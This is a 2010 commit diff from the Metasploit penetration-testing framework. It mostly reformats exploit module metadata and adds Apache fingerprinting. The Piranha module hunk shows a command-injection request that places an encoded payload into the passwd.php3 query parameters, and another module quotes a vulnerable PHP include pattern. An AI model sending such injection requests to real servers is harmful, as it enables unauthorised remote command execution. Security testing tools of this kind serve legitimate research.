various minor fixes, some added fingerprinting

git-svn-id: file:///home/svn/framework3/trunk@9671 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-03 06:21:31 +00:00 · 2010-07-03 06:21:31 +00:00 · a3d901a6b9
parent c7f5ba801c
commit a3d901a6b9
17 changed files with 135 additions and 126 deletions
--- a/modules/exploits/linux/http/piranha_passwd_exec.rb
+++ b/modules/exploits/linux/http/piranha_passwd_exec.rb
@ -63,6 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic perl'
 						}
 				},
 			'Targets'        =>
@ -80,6 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def exploit
+		info = http_fingerprint
+		if not (info =~ /Apache/)
+			raise RuntimeError, 'The target server is not running Apache.'
+		end
+
 		cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
 		str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
 		print_status("Sending GET request with encoded command line...")
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@ -83,7 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Platform' => 'linux'
 						},
 					],
-
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Nov 09 2009'))
--- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
+++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
@ -30,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
-					['OSVDB', '17539'],
-					['BID', '14042'],
+					[ 'OSVDB', '17539' ],
+					[ 'BID', '14042' ],
 				],
 			'Privileged'     => false,
 			'Payload'        =>
--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				where the application includes code like the following:

 				<?php include($_GET['path']); ?>
-
 			},
 			'Author'         => [ 'hdm' , 'egypt' ],
 			'License'        => MSF_LICENSE,
--- a/modules/exploits/unix/webapp/php_vbulletin_template.rb
+++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb
@ -27,17 +27,23 @@ class Metasploit3 < Msf::Exploit::Remote
 				is enabled. All versions of vBulletin prior to 3.0.7 are
 				affected.
 			},
-			'Author'         => [ 'str0ke <str0ke[at]milw0rm.com>', 'cazz' ],
+			'Author'         =>
+				[
+					'str0ke <str0ke[at]milw0rm.com>',
+					'cazz'
+				],
 			'License'        => BSD_LICENSE,
 			'Version'        => '$Revision$',
-			'References'     => [
-				[ 'CVE', '2005-0511'],
-				[ 'BID', '12622'],
-				[ 'OSVDB', '14047'],
+			'References'     =>
+				[
+					[ 'CVE', '2005-0511' ],
+					[ 'BID', '12622' ],
+					[ 'OSVDB', '14047' ],
 				],
 			'Privileged'     => false,
 			'Platform'       => ['unix', 'solaris'],
-			'Payload'        => {
+			'Payload'        =>
+				{
 					'Space'       => 512,
 					'DisableNops' => true,
 					'Keys'        => ['cmd', 'cmd_bash'],
--- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
+++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
@ -84,7 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				'data'         => xml,
 			}, 5)

-
 		if (res and res.body)
 			b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
 			if b